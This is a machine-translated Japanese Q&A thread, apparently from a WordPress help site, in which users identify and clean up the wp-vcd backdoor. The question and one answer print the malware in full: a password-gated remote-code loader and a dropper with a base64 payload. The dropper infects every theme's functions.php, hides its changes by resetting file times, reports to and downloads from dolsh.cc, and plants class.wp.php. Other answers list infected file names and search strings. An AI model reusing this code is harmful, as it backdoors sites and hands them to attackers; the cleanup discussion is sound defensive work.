私のテーマのfunctions.phpにあるこのコードは何ですか？if（isset（$ _ REQUEST ['アクセス']））＆& isset（$ _ REQUEST ['パスワード']）

Question

このコードは私のテーマのfunctions.phpの中、また子テーマの中にもあります。私は2回削除しましたが、戻ってきました。それは何ですか？

if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) { $div_code_name = "wp_vcd"; switch ( $_REQUEST['action'] ) { case 'change_domain'; if ( isset( $_REQUEST['newdomain'] ) ) { if ( ! empty( $_REQUEST['newdomain'] ) ) { if ( $file = @file_get_contents( __FILE__ ) ) { if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http://(.*)/code4\.php/i', $file, $matcholddomain ) ) { $file = preg_replace( '/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file ); @file_put_contents( __FILE__, $file ); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die( "" ); } if ( ! function_exists( 'theme_temp_setup' ) ) { $path = $_SERVER['HTTP_Host'] . $_SERVER[ REQUEST_URI ]; if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) { if ( $tmpcontent = @file_get_contents( "http://www.dolsh.cc/code4.php?i=" . $path ) ) { function theme_temp_setup( $phpCode ) { $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" ); $handle = fopen( $tmpfname, "w+" ); fwrite( $handle, "<?php\n" . $phpCode ); fclose( $handle ); include $tmpfname; unlink( $tmpfname ); return get_defined_vars(); } extract( theme_temp_setup( $tmpcontent ) ); } } }

Milan Petrovic · Answer

あなたのウェブサイトはハッキングされました。これは、「www.dolsh.cc」ドメインからより悪質なコンテンツを読み込んで、外部から引き起こされる悪質なコードです。

削除した後にコンテンツが戻ってきた場合は、ページが読み込まれるたびにfunctions.phpが自動的に書き換えられるような場所でファイルをハッキングしています。あなたはすべての感染したファイルを見つけてきれいにする必要があります、そしてそれはウェブサイトの詳細なレビューなしで感染しているファイルを見分けることは不可能です。このような感染症のほとんどは、駆除が困難であることを確認するためにさまざまな分野に広がっています。

データベースをバックアップしてから、WordPressを最初からすべてのプラグイン、そして感染していないプラグインから再インストールする必要があります。一部のプラグインが感染の原因、またはテーマ自体である可能性があります。違法なWebサイト（無料のプレミアムプラグインを提供）からプラグインやテーマをダウンロードした場合は、それが最も可能性の高い感染源です。

Topy · Answer

Wordfenceを使ってファイルをスキャンします。そして、スキャンは結果を示しています：

27のテーマのfunctions.phpにも上記と同じコードが含まれています。

Wp-includesフォルダに、奇妙なファイル "wp-vcd.php"があります。ファイルには以下のコードが含まれています。

<?php error_reporting(0); ini_set('display_errors', 0); $install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkNCgl7DQokZGl2X2NvZGVfbmFtZT0id3BfdmNkIjsNCgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQ0KCQkJew0KDQoJCQkJDQoNCg0KDQoNCgkJCQljYXNlICdjaGFuZ2VfZG9tYWluJzsNCgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpDQoJCQkJCQkJCXsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZTRcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkNCgkJCQkNCgkJCQlkZWZhdWx0OiBwcmludCAiRVJST1JfV1BfQUNUSU9OIFdQX1ZfQ0QgV1BfQ0QiOw0KCQkJfQ0KCQkJDQoJCWRpZSgiIik7DQoJfQ0KDQoJDQoNCg0KaWYgKCAhIGZ1bmN0aW9uX2V4aXN0cyggJ3RoZW1lX3RlbXBfc2V0dXAnICkgKSB7ICANCiRwYXRoPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUltSRVFVRVNUX1VSSV07DQppZiAoIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsNCg0KaWYoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuZG9sc2guY2MvY29kZTQucGhwP2k9Ii4kcGF0aCkpDQp7DQoNCg0KZnVuY3Rpb24gdGhlbWVfdGVtcF9zZXR1cCgkcGhwQ29kZSkgew0KICAgICR0bXBmbmFtZSA9IHRlbXBuYW0oc3lzX2dldF90ZW1wX2RpcigpLCAidGhlbWVfdGVtcF9zZXR1cCIpOw0KICAgICRoYW5kbGUgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOw0KICAgIGZ3cml0ZSgkaGFuZGxlLCAiPD9waHBcbiIgLiAkcGhwQ29kZSk7DQogICAgZmNsb3NlKCRoYW5kbGUpOw0KICAgIGluY2x1ZGUgJHRtcGZuYW1lOw0KICAgIHVubGluaygkdG1wZm5hbWUpOw0KICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQp9DQoNCmV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOw0KfQ0KfQ0KfQ0KDQoNCg0KPz4='; $install_hash = md5($_SERVER['HTTP_Host'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping = false; } } } } } } if ($ping) { $content = @file_get_contents('http://www.dolsh.cc/o.php?host=' . $_SERVER["HTTP_Host"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.dolsh.cc/admin.txt')); } if ($ping2) { $content = @file_get_contents('http://www.dolsh.cc/o.php?host=' . $_SERVER["HTTP_Host"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.dolsh.cc/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } } ?><?php error_reporting(0);?>

Wp-includesフォルダでは、このコードはpost.phpファイルの一番上にあります。

 <?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php

Wp-includesフォルダに、この行を含む奇妙なファイル "wp-feed"があります。
```
 ::1 127.0.0.1 
```

今私はすべてのテーマのfunctions.phpと関連ファイルからコードを削除し、そして奇妙なファイルを削除した後。私はそのコードがまた戻ってこないことに気づいた。

この問題は、無料のプラグインを提供しているWebサイトからダウンロードしたプラグインに由来します。

Naman Rastogi · Answer

あなたが共有したコードはあなたのWordPressウェブサイトでwp-vcdマルウェアに向かっています。 wp-vcdマルウェアの主な症状はスパムポップアップであり、WebサイトにスパムURLを作成します。

悪意のあるコードの亜種の中には、WordPressのコアファイルを改変したり、/ wp-includesディレクトリに新しいファイルを追加するものがあります。

このマルウェアは、ハッカーがあなたのウェブサイトに長期間アクセスすることを可能にするバックドアを作成します。
ハッカーはWordPressのプラグインとテーマの脆弱性を悪用して、脆弱なサイトにwp-vcdマルウェアをアップロードすることができます。

テーマ内のfunctions.phpファイルには、次のようなコードがあります。

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

クリーニング

方法1 - 通常wp-vcdハックに感染しているサーバー上のファイルを検索する

wp-includes/wp-vcd.php
wp-includes/wp-tmp.ph
wp-content/themes/*/functions.php（アクティブかどうかにかかわらず、サーバーにインストールされているすべてのテーマ）
class.theme-modules.php（テーマフォルダ内）

アプローチ2 - 感染したマルウェアファイルにある文字列パターンを検索する

tmpcontentx
関数wp_temp_setupx
wp-tmp.php
derna.top/code.php
stripos（$ tmpcontent、$ wp_auth_key）

参考のために - https://www.getastra.com/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/

wpgeek · Answer

プレミアムプラグインを無料でダウンロードした場合は、両方のファイルがあるかどうかを確認してください。これらはこの問題の背後にあるファイルです。

class.plugin-modules.php class.theme-modules.php

インストールする前は、このファイルのサイズは35kbでしたが、一度インストールしてテーマ/プラグインを有効にすると、ホスティング内のすべてのwp-includesフォルダにコードが移動します。だからそれは隠された他のすべてのサイトに住み続ける。